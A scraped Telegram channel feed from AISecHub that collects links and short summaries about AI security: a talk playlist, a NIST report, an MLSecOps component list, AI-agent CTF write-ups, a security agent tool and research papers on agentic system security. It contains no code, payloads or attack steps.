AISecHub – Telegram
AISecHub
1.49K subscribers
555 photos
36 videos
254 files
1.42K links
https://linktr.ee/aisechub managed by AISecHub. Sponsored by: innovguard.com
Download Telegram
Top AI Security YouTube Videos — November 2025 - https://youtube.com/playlist?list=PLFO56KBxdGBeXiLJ8JHxGliXzXZNq-f-x

This playlist collects more than 30 new AI security talks from SAINTCON, Black Hat, BSides, NorthSec, Hack In The Box, LABScon, DevCon, DjangoCon and Everything Open across November 2025. Sessions explore AI driven cyber attacks, agentic workflows and MCP abuse, jailbreak tactics and guardrail failures, LLM enabled malware and offensive tooling, AI disinformation operations, secure adoption of LLMs in FinTech and cloud, and practical lessons from real world research and incident response.

https://medium.com/ai-security-hub/top-ai-security-youtube-videos-november-2025-5f09db69ca42
🔥2👍1👏1
Assessing Risks and Impacts of AI (ARIA).pdf
7.7 MB
Assessing Risks and Impacts of AI (ARIA) - NIST

Source: https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.700-2.pdf
🔥2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
📌 Components of MLSecOps

🔹 Model Hardening
Strengthen models with adversarial training and reduce vulnerability to attacks.

🔹 Dataset Integrity & Validation
Detect poisoned data, validate distributions, and identify anomalies in input.

🔹 Data Security & Governance
Protect training data, enforce access control, and manage sensitive information securely.

🔹 MLOps Integration
Ensure continuous security testing, CI/CD protection, and safe ML deployments.

🔹 Supply Chain Security
Secure model files, dependencies, and detect malicious or tampered libraries.

🔹 Audit, Compliance & Logging
Track model changes, maintain audit trails, and meet regulatory requirements.

🔹 Model Explainability & Transparency
Understand model decisions, detect bias, and ensure responsible model behavior.

🔹 Secure Deployment & Serving
Enforce authentication, protect inference endpoints, and run encrypted model serving.

🔹 Model Monitoring & Drift Detection
Detect drift, anomalies, degradation, and emerging risks in real time.

🔹 Threat Detection & Attack Prevention
Identify extraction attempts, inversion attacks, prompt injection, and API abuse.

(By Shalini Goyal)
3👍1👏1
👍3🔥3🍾1
Neurogrid CTF: The Ultimate AI Security Showdown - Agent of 0ca / BoxPwnr Write-up


On November 20-24, 2024, I participated with BoxPwnr in Neurogrid CTF - the first AI-only CTF competition hosted by Hack The Box with $50k in AI credits for the top 3 teams. This wasn’t a typical CTF where humans solve challenges; instead, AI agents competed autonomously in a hyper-realistic cyber arena. My autonomous agent secured 5th place, solving 38/45 flags(84.4% completion) across 36 challenges without any manual intervention.

https://0ca.github.io/ctf/ai/security/2025/11/28/neurogrid-ctf-writeup.html
🔥42😎2
🤓3🔥2👍1
HeliosBank LLM CTF Series - LLM DFIR CTF

Each incident simulates a real-world AI-driven compromise inside HeliosBank’s internal systems

https://eliwoodward.github.io/LLM_CTF/
🔥3🤔3👍1
AI agents find $4.6M in blockchain smart contract exploits

https://red.anthropic.com/2025/smart-contracts/
😱2👎1🔥1
AISecHub pinned «AI Security Newsletter - November 2025 https://www.linkedin.com/posts/adgnji_aisecurity-adversarialai-redteamai-activity-7401545671746740225-L9Xt?»
🧰 raptor - Raptor turns Claude Code into a general-purpose AI offensive/defensive security agent. By using Claude.md and creating rules, sub-agents, and skills, we configure the agent for adversarial thinking, and perform research or attack/defense operations. ⭐️ 124 https://github.com/gadievron/raptor.
🔥2
💯1🎄1
Security research in the age of AI tools

In this article, I try to show how my work as a security researcher has changed and how the new AI tools have impacted my workflow, productivity, and overall approach to security research. I present two vulnerabilities discovered by other researchers, show how I investigated them to create security checks for our Invicti DAST product, and describe how AI tools helped me in the process.

https://invicti.com/blog/security-labs/security-research-in-the-age-of-ai-tools
Systems Security Foundations for Agentic Computing - https://arxiv.org/pdf/2512.01295

This paper articulates short- and long-term research problems in AI agent security and privacy, using the lens of computer systems security. This approach examines end-to-end security properties of entire systems, rather than AI models in isolation. While we recognize that hardening a single model is useful, it is important to realize that it is often insufficient. By way of an analogy, creating a model that is always helpful and harmless is akin to creating software that is always helpful and harmless.

The collective experience of decades of cybersecurity research and practice shows that this is insufficient. Rather, constructing an informed and realistic attacker model before building a system, applying hard-earned lessons from software security, and continuous improvement of security posture is a tried-and-tested approach to securing real computer systems. A key goal is to examine where research challenges arise when applying traditional security principles in the context of AI agents.

A secondary goal of this report is to distill these ideas for AI and ML practitioners and researchers. We discuss the challenges of applying security principles to agentic computing, present 11 case studies of real attacks on agentic systems, and define a series of new research problems specific to the security of agentic systems.
👍1